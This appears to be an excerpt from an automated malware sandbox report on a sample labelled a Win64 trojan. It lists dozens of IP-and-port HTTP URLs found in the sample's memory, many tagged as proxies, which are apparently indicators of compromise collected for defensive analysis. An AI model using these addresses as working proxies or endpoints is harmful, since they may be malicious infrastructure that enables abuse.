                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:81
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:81://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:82
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:82://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:8828
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:8828://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:9990
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:9990://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:9999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:9999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.20.56.203:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.20.56.203:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.219.10.150:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.219.10.150:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.24.80.53:3829
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.24.80.53:3829://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.241.128.44:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.241.128.44:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.241.135.30:7777
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.241.135.30:7777://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.251.103.186:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.251.103.186:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7887000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C783A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.4.242.216:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C790E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.4.242.216:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.54.114.101
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.54.114.101://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.54.114.101:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.54.114.103
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.54.114.103://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.54.114.103:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.54.114.35
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.54.114.35://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.54.114.35:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.54.114.99
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.54.114.99://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.54.114.99:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.54.142.46:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.54.142.46:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA61A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.54.201.92:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.54.201.92:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.57.92.172:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.57.92.172:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.57.93.170:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.57.93.170:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.57.93.181:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.57.93.181:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.57.93.189:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.57.93.189:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C696E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.57.93.1:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.57.93.1:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.58.245.66:61393
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.58.245.66:61393://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.69.190.218:41122
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.69.190.218:41122://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.69.190.52:41122
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.69.190.52:41122://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.69.232.223:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.69.232.223:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F14000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.69.233.44:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.69.233.44:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.69.236.133:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.69.236.133:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.69.236.73:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.69.236.73:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.69.237.183:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.69.237.183:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.7.131.208:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.7.131.208:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD37000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.7.201.174:15202
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.7.201.174:15202://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.70.48.53:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.70.48.53:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB2A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.70.49.155:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.70.49.155:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.70.49.56:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.70.49.56:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E70000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.163.120.181:58837
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.163.120.181:58837://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.163.13.200:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.163.13.200:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.172.239.231:8180
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.172.239.231:8180://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.173.230.19:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.173.230.19:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.173.242.189:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.173.242.189:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.174.209.124:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.174.209.124:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.67.170.
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.67.170.121:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.67.170.121:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C771A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.67.216.94:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.67.216.94:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.67.220.225:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.67.220.225:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.67.223.4:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.67.223.4:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.71.99.233:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.71.99.233:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.91.175.146:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.91.175.146:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.99.108.4:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.99.108.4:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7ED8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.99.96.170:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.99.96.170:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.15.90.78:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.15.90.78:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9237000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.145.147:45326
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.145.147:45326://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.149.147:5020
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.149.147:5020://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.149.24:5020
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.149.24:5020://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.152.30:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.152.30:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C921B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C91E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.202.6.231:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C91E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.202.6.231:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.237.43.106
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.237.43.106://proxy
